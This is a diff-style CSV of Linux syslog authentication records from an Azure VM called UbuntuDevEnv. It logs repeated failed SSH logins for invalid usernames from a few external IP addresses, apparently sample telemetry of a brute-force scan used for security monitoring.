+5372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:48:33,UbuntuDevEnv,2019-06-26 15:48:33,auth,UbuntuDevEnv,info,Disconnected from invalid user yuanwd 192.241.213.168 port 45858 [preauth],27040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yuanwd,192.241.213.1,45858,,
+5373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:48:48,UbuntuDevEnv,2019-06-26 15:48:48,auth,UbuntuDevEnv,info,Invalid user vmail from 66.70.130.155 port 42930,27096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vmail,66.70.130.1,42930,,
+5374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:48:48,UbuntuDevEnv,2019-06-26 15:48:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,27096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:48:48,UbuntuDevEnv,2019-06-26 15:48:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:48:50,UbuntuDevEnv,2019-06-26 15:48:50,auth,UbuntuDevEnv,info,Failed password for invalid user vmail from 66.70.130.155 port 42930 ssh2,27096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vmail,66.70.130.1,42930,,
+5377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:48:50,UbuntuDevEnv,2019-06-26 15:48:50,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 42930:11: Bye Bye [preauth],27096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,42930,,
+5378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:48:50,UbuntuDevEnv,2019-06-26 15:48:50,auth,UbuntuDevEnv,info,Disconnected from invalid user vmail 66.70.130.155 port 42930 [preauth],27096,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vmail,66.70.130.1,42930,,
+5379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:49:29,UbuntuDevEnv,2019-06-26 15:49:29,auth,UbuntuDevEnv,info,Invalid user admin from 189.199.48.32 port 42637,27230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,189.199.48.3,42637,,
+5380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:49:29,UbuntuDevEnv,2019-06-26 15:49:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:49:29,UbuntuDevEnv,2019-06-26 15:49:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=189.199.48.32,27230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,189.199.48.3,,0,
+5382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:49:31,UbuntuDevEnv,2019-06-26 15:49:31,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 189.199.48.32 port 42637 ssh2,27230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,189.199.48.3,42637,,
+5383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:49:31,UbuntuDevEnv,2019-06-26 15:49:31,auth,UbuntuDevEnv,info,Connection closed by invalid user admin 189.199.48.32 port 42637 [preauth],27230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,189.199.48.3,42637,,invalid
+5384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:50:42,UbuntuDevEnv,2019-06-26 15:50:41,auth,UbuntuDevEnv,info,Invalid user pnjeri from 192.241.213.168 port 34350,27500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pnjeri,192.241.213.1,34350,,
+5385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:50:42,UbuntuDevEnv,2019-06-26 15:50:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,27500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:50:42,UbuntuDevEnv,2019-06-26 15:50:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:50:44,UbuntuDevEnv,2019-06-26 15:50:43,auth,UbuntuDevEnv,info,Failed password for invalid user pnjeri from 192.241.213.168 port 34350 ssh2,27500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pnjeri,192.241.213.1,34350,,
+5388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:50:44,UbuntuDevEnv,2019-06-26 15:50:43,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 34350:11: Bye Bye [preauth],27500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,34350,,
+5389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:50:44,UbuntuDevEnv,2019-06-26 15:50:43,auth,UbuntuDevEnv,info,Disconnected from invalid user pnjeri 192.241.213.168 port 34350 [preauth],27500,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pnjeri,192.241.213.1,34350,,
+5390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:50:50,UbuntuDevEnv,2019-06-26 15:50:50,auth,UbuntuDevEnv,info,Invalid user yue from 66.70.130.155 port 59908,27539,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yue,66.70.130.1,59908,,
+5391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:50:50,UbuntuDevEnv,2019-06-26 15:50:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,27539,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:50:50,UbuntuDevEnv,2019-06-26 15:50:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27539,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:50:52,UbuntuDevEnv,2019-06-26 15:50:52,auth,UbuntuDevEnv,info,Failed password for invalid user yue from 66.70.130.155 port 59908 ssh2,27539,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yue,66.70.130.1,59908,,
+5394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:50:53,UbuntuDevEnv,2019-06-26 15:50:52,auth,UbuntuDevEnv,info,Disconnected from invalid user yue 66.70.130.155 port 59908 [preauth],27539,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yue,66.70.130.1,59908,,
+5395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:50:53,UbuntuDevEnv,2019-06-26 15:50:52,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 59908:11: Bye Bye [preauth],27539,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,59908,,
+5396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:52:42,UbuntuDevEnv,2019-06-26 15:52:42,auth,UbuntuDevEnv,info,Invalid user openbravo from 192.241.213.168 port 51072,28000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,openbravo,192.241.213.1,51072,,
+5397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:52:42,UbuntuDevEnv,2019-06-26 15:52:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,28000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:52:42,UbuntuDevEnv,2019-06-26 15:52:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,28000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:52:44,UbuntuDevEnv,2019-06-26 15:52:44,auth,UbuntuDevEnv,info,Failed password for invalid user openbravo from 192.241.213.168 port 51072 ssh2,28000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,openbravo,192.241.213.1,51072,,
+5400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:52:44,UbuntuDevEnv,2019-06-26 15:52:44,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 51072:11: Bye Bye [preauth],28000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,51072,,
+5401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:52:44,UbuntuDevEnv,2019-06-26 15:52:44,auth,UbuntuDevEnv,info,Disconnected from invalid user openbravo 192.241.213.168 port 51072 [preauth],28000,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,openbravo,192.241.213.1,51072,,
+5402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:53:00,UbuntuDevEnv,2019-06-26 15:52:59,auth,UbuntuDevEnv,info,Invalid user ke from 66.70.130.155 port 48654,28065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ke,66.70.130.1,48654,,
+5403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:53:00,UbuntuDevEnv,2019-06-26 15:52:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,28065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:53:00,UbuntuDevEnv,2019-06-26 15:52:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,28065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:53:02,UbuntuDevEnv,2019-06-26 15:53:01,auth,UbuntuDevEnv,info,Failed password for invalid user ke from 66.70.130.155 port 48654 ssh2,28065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ke,66.70.130.1,48654,,
+5406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:53:02,UbuntuDevEnv,2019-06-26 15:53:01,auth,UbuntuDevEnv,info,Disconnected from invalid user ke 66.70.130.155 port 48654 [preauth],28065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ke,66.70.130.1,48654,,
+5407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:53:02,UbuntuDevEnv,2019-06-26 15:53:01,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 48654:11: Bye Bye [preauth],28065,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,48654,,
+5408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:54:39,UbuntuDevEnv,2019-06-26 15:54:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168  user=test,28412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,192.241.213.1,,0,
+5409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:54:41,UbuntuDevEnv,2019-06-26 15:54:41,auth,UbuntuDevEnv,info,Failed password for test from 192.241.213.168 port 39560 ssh2,28412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,39560,,
+5410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:54:41,UbuntuDevEnv,2019-06-26 15:54:41,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 192.241.213.168 port 39560 [preauth],28412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,192.241.213.1,39560,,
+5411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:54:41,UbuntuDevEnv,2019-06-26 15:54:41,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 39560:11: Bye Bye [preauth],28412,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,39560,,
+5412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:55:07,UbuntuDevEnv,2019-06-26 15:55:07,auth,UbuntuDevEnv,info,Invalid user phil from 66.70.130.155 port 37400,28515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,phil,66.70.130.1,37400,,
+5413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:55:07,UbuntuDevEnv,2019-06-26 15:55:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,28515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:55:07,UbuntuDevEnv,2019-06-26 15:55:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,28515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:55:09,UbuntuDevEnv,2019-06-26 15:55:09,auth,UbuntuDevEnv,info,Failed password for invalid user phil from 66.70.130.155 port 37400 ssh2,28515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,phil,66.70.130.1,37400,,
+5416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:55:09,UbuntuDevEnv,2019-06-26 15:55:09,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 37400:11: Bye Bye [preauth],28515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,37400,,
+5417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:55:09,UbuntuDevEnv,2019-06-26 15:55:09,auth,UbuntuDevEnv,info,Disconnected from invalid user phil 66.70.130.155 port 37400 [preauth],28515,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,phil,66.70.130.1,37400,,
+5418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:56:43,UbuntuDevEnv,2019-06-26 15:56:42,auth,UbuntuDevEnv,info,Invalid user sylvestre from 192.241.213.168 port 56280,28849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sylvestre,192.241.213.1,56280,,
+5419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:56:43,UbuntuDevEnv,2019-06-26 15:56:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,28849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:56:43,UbuntuDevEnv,2019-06-26 15:56:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,28849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:56:45,UbuntuDevEnv,2019-06-26 15:56:44,auth,UbuntuDevEnv,info,Failed password for invalid user sylvestre from 192.241.213.168 port 56280 ssh2,28849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sylvestre,192.241.213.1,56280,,
+5422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:56:45,UbuntuDevEnv,2019-06-26 15:56:45,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 56280:11: Bye Bye [preauth],28849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,56280,,
+5423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:56:45,UbuntuDevEnv,2019-06-26 15:56:45,auth,UbuntuDevEnv,info,Disconnected from invalid user sylvestre 192.241.213.168 port 56280 [preauth],28849,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sylvestre,192.241.213.1,56280,,
+5424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:57:11,UbuntuDevEnv,2019-06-26 15:57:11,auth,UbuntuDevEnv,info,Invalid user media from 66.70.130.155 port 54378,28953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,media,66.70.130.1,54378,,
+5425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:57:11,UbuntuDevEnv,2019-06-26 15:57:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,28953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:57:11,UbuntuDevEnv,2019-06-26 15:57:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,28953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:57:13,UbuntuDevEnv,2019-06-26 15:57:13,auth,UbuntuDevEnv,info,Failed password for invalid user media from 66.70.130.155 port 54378 ssh2,28953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,media,66.70.130.1,54378,,
+5428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:57:14,UbuntuDevEnv,2019-06-26 15:57:13,auth,UbuntuDevEnv,info,Disconnected from invalid user media 66.70.130.155 port 54378 [preauth],28953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,media,66.70.130.1,54378,,
+5429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:57:14,UbuntuDevEnv,2019-06-26 15:57:13,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 54378:11: Bye Bye [preauth],28953,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,54378,,
+5430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:58:47,UbuntuDevEnv,2019-06-26 15:58:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,29343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5431,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:58:47,UbuntuDevEnv,2019-06-26 15:58:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,29343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
